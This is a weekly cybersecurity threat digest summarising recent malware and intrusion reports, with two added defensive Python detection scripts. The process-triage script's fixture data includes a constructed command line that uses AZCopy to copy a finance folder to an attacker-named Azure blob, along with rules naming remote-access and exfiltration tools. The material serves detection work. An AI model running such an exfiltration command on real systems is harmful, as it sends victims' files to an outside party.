Cybersecurity Wiretap #29: From DNS Hijacking to Remcos RAT with a Focus on Network Exploitation (week of 04/11/2024)

Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.

1. CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging by @Securonix Threat Research

  • attackers deliver a custom-built, QEMU-emulated Linux environment through phishing emails and use it to persist on the endpoint
  • the Linux instance comes pre-configured with a backdoor that automatically connects to an attacker-controlled command and control (C2) server
  • because the malicious activity runs inside the emulated guest, the attacker can stage further operations in a concealed environment that traditional antivirus solutions struggle to inspect, making detection difficult

https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/

2. QUISHING THE NEW AGE THREAT IN DIGITAL FRAUD by @CyfirmaR

  • quishing, phishing that abuses QR codes, is on the rise, with a 433% increase in reported incidents from 2023 to 2024
  • cybercriminals embed malicious links in QR codes that lead victims to pages designed to harvest sensitive information
  • ~90% of these attacks target user credentials

https://www.cyfirma.com/research/quishing-the-new-age-threat-in-digital-fraud/

3. SpyNote: Unmasking a Sophisticated Android Malware by @CyfirmaR

  • distributed as a fake antivirus and, upon installation, adopts the name and icon of “Avast Mobile Security for Android” to deceive users
  • SpyNote abuses the accessibility permission to grant itself extensive control over the device, including excluding itself from battery optimization and enabling notifications
  • it simulates user gestures to grant itself further permissions silently in the background
  • displays continuous silent notifications about a fake system update
  • prevents uninstallation by simulating user actions to block removal attempts.

https://www.cyfirma.com/research/spynote-unmasking-a-sophisticated-android-malware/

4. WISH STEALER by @CyfirmaR

  • new Node.js-based malware targeting Windows users that steals sensitive data from Discord, browsers, and cryptocurrency wallets by exploiting user sessions and using privilege escalation
  • it extracts login credentials, cookies, and credit card details, and can disable antivirus software while monitoring 2FA codes

https://www.cyfirma.com/research/wish-stealer/

5. Life on a crooked RedLine: Analyzing the infamous infostealer’s backend by @ESETresearch

  • researchers, working with law enforcement, collected multiple modules used to run the infrastructure behind RedLine Stealer, providing insight into the internal workings of this malware-as-a-service empire
  • over 1,000 unique IP addresses used to host RedLine control panels

https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/

6. Automatically Detecting DNS Hijacking in Passive DNS by PaloAlto’s #Unit42

  • threat actors compromise domains for a variety of attacks, including meddler-in-the-middle (MitM) attacks, drive-by downloads, phishing and scams
  • hijackers exploit a victim domain's reputation to steer its visitors into malicious campaigns, regardless of what those visitors expected to find there

https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/
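As an added illustration of the detection idea behind this item (example code written for this digest, not Unit 42's system or their published heuristics), the script below scans a small set of constructed passive DNS observations and flags domains whose long-stable A record is abruptly replaced by an address in a different /24, then groups flagged domains that land in the same new prefix. The 180-day stability threshold, the 7-day "abrupt replacement" window and the /24 grouping are assumptions chosen for the example:

```python
from collections import defaultdict
from datetime import date
from ipaddress import ip_network

# Constructed passive DNS observations (not real data):
# (name, rrtype, rdata, first_seen, last_seen)
PDNS = [
    ("shop.example.org", "A", "198.51.100.20", date(2022, 1, 5), date(2024, 10, 30)),
    ("shop.example.org", "A", "203.0.113.77", date(2024, 11, 1), date(2024, 11, 4)),
    ("shop.example.org", "NS", "ns1.example-hosting.net", date(2022, 1, 5), date(2024, 11, 4)),
    ("news.example.com", "A", "198.51.100.41", date(2021, 6, 1), date(2024, 10, 31)),
    ("news.example.com", "A", "203.0.113.78", date(2024, 11, 2), date(2024, 11, 4)),
    ("blog.example.net", "A", "192.0.2.9", date(2020, 3, 3), date(2024, 11, 4)),
    # A planned migration that stays inside the same /24: should not be flagged.
    ("cdn.example.com", "A", "192.0.2.50", date(2023, 1, 1), date(2024, 6, 1)),
    ("cdn.example.com", "A", "192.0.2.51", date(2024, 6, 2), date(2024, 11, 4)),
]


def prefix(addr):
    """Assumed grouping granularity: the /24 containing the address."""
    return ip_network(f"{addr}/24", strict=False)


def a_record_history(records):
    """Group A records per name, ordered by first_seen."""
    by_name = defaultdict(list)
    for name, rrtype, rdata, first, last in records:
        if rrtype == "A":
            by_name[name].append((first, last, rdata))
    for hist in by_name.values():
        hist.sort()
    return by_name


def suspicious_transitions(records, min_stable_days=180, max_gap_days=7):
    """A record that was stable for a long time, replaced within a few days
    by an address in a different /24, is a hijack candidate."""
    found = []
    for name, hist in a_record_history(records).items():
        for (f1, l1, old), (f2, _l2, new) in zip(hist, hist[1:]):
            stable = (l1 - f1).days >= min_stable_days
            abrupt = (f2 - l1).days <= max_gap_days
            moved = prefix(old) != prefix(new)
            if stable and abrupt and moved:
                found.append({"name": name, "old": old, "new": new, "when": f2})
    return found


def find_hijack_candidates(records, min_stable_days=180, max_gap_days=7):
    """Score each candidate by how many other flagged domains moved into the
    same new prefix: unrelated domains converging on one network is a
    stronger hijack signal than a single move."""
    cands = suspicious_transitions(records, min_stable_days, max_gap_days)
    hub = defaultdict(set)
    for c in cands:
        hub[prefix(c["new"])].add(c["name"])
    for c in cands:
        c["cohort"] = sorted(hub[prefix(c["new"])] - {c["name"]})
        c["score"] = 1 + len(c["cohort"])
    return sorted(cands, key=lambda c: (-c["score"], c["name"]))


if __name__ == "__main__":
    for c in find_hijack_candidates(PDNS):
        print(f'{c["name"]}: {c["old"]} -> {c["new"]} on {c["when"]} '
              f'(score {c["score"]}, cohort {c["cohort"]})')
```

Legitimate provider migrations match the same pattern, so in practice the candidates need enrichment before anyone acts on them: whether the new address's ASN or registrant differs from the old one, whether the NS delegation or the TLS certificate changed at the same time, and whether the new prefix is already known to host unrelated hijacked domains.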

7. Silent Skimmer Gets Loud (Again) by PaloAlto’s #Unit42

  • the adversary compromised multiple web servers to gain access to the environment of a multinational organization headquartered in North America
  • based on overlaps in infrastructure and tooling, as well as tactics, techniques and procedures (TTPs), the activity can be attributed to the same threat actor behind the Silent Skimmer campaign

https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/

8. Threat Campaign Spreads Winos4.0 Through Game Application by #FORTIGUARD LABS

  • multiple samples of Winos4.0 malware hidden within gaming-related applications, including installation tools, speed boosters, and optimization utilities
  • analysis of the decoded DLL file reveals a potential targeting of the education sector, as indicated by its file description, “校园政务” (Campus Administration)

https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos4-through-game-application

9. New Campaign Uses Remcos RAT to Exploit Victims by #FORTIGUARD LABS

  • the campaign starts with a phishing email carrying a malicious Excel document
  • the document delivers a new variant of the Remcos RAT

https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims

10. Unwrapping the emerging Interlock ransomware attack by @TalosSecurity

  • attacker used multiple components in the delivery chain including a Remote Access Tool (RAT) masquerading as a fake browser updater, PowerShell scripts, a credential stealer, and a keylogger before deploying and enabling the ransomware encryptor binary
  • primarily used remote desktop protocol (RDP) to move laterally within the victim’s network, as well as other tools such as AnyDesk and PuTTY
  • used Azure Storage Explorer, which leverages the utility AZCopy, to exfiltrate data to an attacker-controlled Azure storage blob.

https://blog.talosintelligence.com/emerging-interlock-ransomware/
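Two items in this digest describe tooling that leaves process-creation evidence on the endpoint: the CRON#TRAP item (item 1), where a QEMU guest is launched from a phishing-delivered payload, and the Interlock item above, where AnyDesk, PuTTY and RDP were used for lateral movement and AZCopy / Azure Storage Explorer for exfiltration to an Azure blob. The script below is an added triage example written for this digest, not code from Talos or Securonix: it runs a few rules over constructed process-creation events (the field names, hostnames, paths, the "user-writable path" heuristic and the rule set are all assumptions) and then correlates per host the combination of remote-access tool plus blob-storage upload that the Interlock write-up describes:

```python
import ntpath

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
EVENTS = [
    {"id": 1, "host": "WS-HR-05", "parent": "explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\qemu\qemu-system-x86_64.exe",
     "cmdline": "qemu-system-x86_64.exe -m 256 -drive file=tc.qcow2 -nographic"},
    # Same binary installed system-wide by a developer: not flagged by the path rule.
    {"id": 2, "host": "DEV-01", "parent": "cmd.exe",
     "image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
     "cmdline": "qemu-system-x86_64.exe -m 2048 -hda dev.qcow2"},
    {"id": 3, "host": "WS-FIN-02", "parent": "cmd.exe",
     "image": r"C:\Users\bob\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Finance" "https://exfil0x.blob.core.windows.net/c?sv=<sas-token>" --recursive'},
    {"id": 4, "host": "WS-FIN-02", "parent": "explorer.exe",
     "image": r"C:\Users\bob\AppData\Local\Programs\Microsoft Azure Storage Explorer\StorageExplorer.exe",
     "cmdline": "StorageExplorer.exe"},
    {"id": 5, "host": "WS-FIN-02", "parent": "services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 6, "host": "WS-FIN-02", "parent": "explorer.exe",
     "image": r"C:\Users\bob\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe --silent"},
    {"id": 7, "host": "WS-FIN-02", "parent": "cmd.exe",
     "image": r"C:\Tools\putty.exe", "cmdline": "putty.exe -ssh admin@10.0.0.5"},
    {"id": 8, "host": "WS-FIN-02", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\mstsc.exe", "cmdline": "mstsc.exe /v:10.0.0.7"},
]


def basename(image):
    # ntpath handles Windows separators regardless of the analysis host's OS.
    return ntpath.basename(image).lower()


def user_writable(path):
    """Assumed heuristic: directories an unprivileged user can write to."""
    p = path.lower()
    return any(seg in p for seg in ("\\users\\", "\\temp\\", "\\programdata\\"))


# (rule name, predicate over one event)
RULES = [
    # CRON#TRAP-style staging: a QEMU system emulator started from a user-writable path.
    ("qemu_from_user_path",
     lambda e: basename(e["image"]).startswith("qemu-system") and user_writable(e["image"])),
    # Interlock-style exfiltration: AZCopy pushing data to an Azure blob endpoint.
    ("azcopy_to_blob",
     lambda e: basename(e["image"]) == "azcopy.exe" and "blob.core.windows.net" in e["cmdline"].lower()),
    ("storage_explorer", lambda e: basename(e["image"]) == "storageexplorer.exe"),
    # Remote-access tooling named in the Interlock write-up.
    ("remote_admin_tool", lambda e: basename(e["image"]) in {"anydesk.exe", "putty.exe"}),
    ("rdp_client", lambda e: basename(e["image"]) == "mstsc.exe"),
]

LATERAL = {"remote_admin_tool", "rdp_client"}
EXFIL = {"azcopy_to_blob", "storage_explorer"}


def triage(events):
    """Return (event id, rule name) for every rule each event matches."""
    return [(e["id"], name) for e in events for name, match in RULES if match(e)]


def hosts_with_exfil_chain(events):
    """Hosts showing both a remote-access tool and a blob upload: the
    lateral-movement-then-exfiltration pairing described for Interlock."""
    by_host = {}
    rules_by_id = {}
    for eid, rule in triage(events):
        rules_by_id.setdefault(eid, set()).add(rule)
    for e in events:
        by_host.setdefault(e["host"], set()).update(rules_by_id.get(e["id"], set()))
    return sorted(h for h, rules in by_host.items() if rules & LATERAL and rules & EXFIL)


if __name__ == "__main__":
    for eid, rule in triage(EVENTS):
        print(f"event {eid}: {rule}")
    print("exfil chain on:", hosts_with_exfil_chain(EVENTS))
```

The path rule is deliberately narrow so that a developer's system-wide QEMU install does not fire; in a real estate you would pair it with the parent process (Office or a shortcut launched from a ZIP is far more suspicious than a terminal) and with an allowlist of sanctioned remote-access tools, since AnyDesk, PuTTY and mstsc.exe are all legitimate in many environments.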

11. Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations by @TrendMicro

  • Earth Estries employs two distinct attack chains in their campaigns that have some common characteristics, such as the exploitation of vulnerabilities in systems like Microsoft Exchange servers and network adapter management tools.
  • the first chain uses PsExec and tools such as Trillclient, Hemigate, and Crowdoor delivered via CAB files
  • the second chain employs malware like Zingdoor and SnappyBee, delivered through cURL downloads

https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html

Thank you for reading.
